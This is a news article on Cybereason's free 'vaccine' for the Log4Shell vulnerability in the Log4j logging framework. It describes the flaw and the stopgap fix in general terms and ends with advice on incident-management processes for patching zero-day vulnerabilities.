Cybereason has created what it described as a “vaccine” for the Apache Log4Shell vulnerability (CVE-2021-44228) that is roiling organizations that rely on the open source Log4j logging framework to manage Java applications.
The Log4j framework is used by almost every Java application, which means the time and effort required to patch every instance can be significant. In the meantime, cybercriminals are already looking to exploit a remote code execution (RCE) vulnerability in the framework.
The vulnerability allows cybercriminals to take control of any Java-based, internet-facing server and engage in remote code execution (RCE) attacks using a plug-in capability that was originally designed to make it easier to extend the logging platform. In recent releases of Log4j, that capability is turned on by default. A malicious attacker can exploit the vulnerability by sending a malicious code string that is logged by Log4j. At that point, the exploit will allow the attacker to load arbitrary Java code and take control of the server. The vaccine Cybereason made available free of charge on GitHub makes use of the vulnerability itself to launch a flag that turns off the plug-in capability when it’s detected.
Cybereason CTO Yonatan Striem-Amit said it’s generally simpler to download a vaccine that changes the vulnerable server’s configuration. That approach is not intended to eliminate the need to patch Log4j but, rather, to buy organizations’ enterprise IT teams more time to patch every instance of the framework they have running, he said. The vaccine requires only basic Java skills to implement, he noted. Alternatively, an IT team can permanently close the vulnerability by saving a configuration file to each server.
It’s not clear to what degree this vulnerability may have already been exploited, but this latest in a series of zero-day vulnerabilities is already taking a toll on IT teams large and small. Those IT teams should also expect the rate at which zero-day vulnerabilities are being disclosed will increase as more cybersecurity research is conducted. The issue cybersecurity teams now need to come to terms with is setting up a process that enables them to consistently remediate zero-day vulnerabilities with as little disruption as possible.
In fact, cybersecurity teams would be well-advised to crib some of the best practices that have been defined for modern IT incident management platforms to minimize the level of disruption created by the need to suddenly apply a patch. Based on processes that are rooted in the workflows DevOps teams have created to automate application deployment, a modern incident management platform enables IT teams to essentially expect the unexpected and quickly and effectively respond to it.
As IT teams become accustomed to responding to sudden events, the process will become more routine. That routine not only makes the organization more resilient in the face of a zero-day vulnerability, it also serves to reduce the overall stress of the IT team. This is critical at a time when burnout rates are contributing to higher rates of staff turnover, especially as most organizations are already chronically understaffed.
By Security Boulevard
